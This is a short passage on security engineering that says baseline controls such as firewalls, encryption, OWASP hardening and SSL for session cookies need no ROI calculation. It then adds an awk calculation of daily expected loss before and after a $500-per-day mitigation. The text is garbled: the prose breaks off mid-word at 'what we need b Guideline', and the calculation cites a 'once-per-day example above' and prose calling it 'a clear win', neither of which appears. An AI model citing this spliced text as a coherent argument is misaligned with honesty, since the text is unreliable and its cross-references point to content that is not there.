We know we need a certain number of toilets per building, even without doing ROI on the value of such toilets. The same is true for a lot of security engineering. We know we need firewalls, encryption, and OWASP hardening, even without specifically doing a calculation. Passwords and session cookies need to go across SSL. That's the starting point from which we begin to analyze risks and mitigations -- what we need b Guideline
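As the back-of-the-envelope check of the once-per-day example above (a sketch only; awk is used here purely as a calculator):

# Expected daily loss without mitigation: 1 event/day at $1000/event.
# With the $500/day mitigation: 1 event/week at $1000, plus the mitigation cost.
awk 'BEGIN {
    before = 1 * 1000             # $1000/day expected loss
    after  = (1/7) * 1000 + 500   # about $642.86/day, loss plus mitigation
    printf "before: $%.2f/day  after: $%.2f/day\n", before, after
}'

The mitigation comes out roughly $357/day ahead, which is why the prose above calls it a clear win for investment.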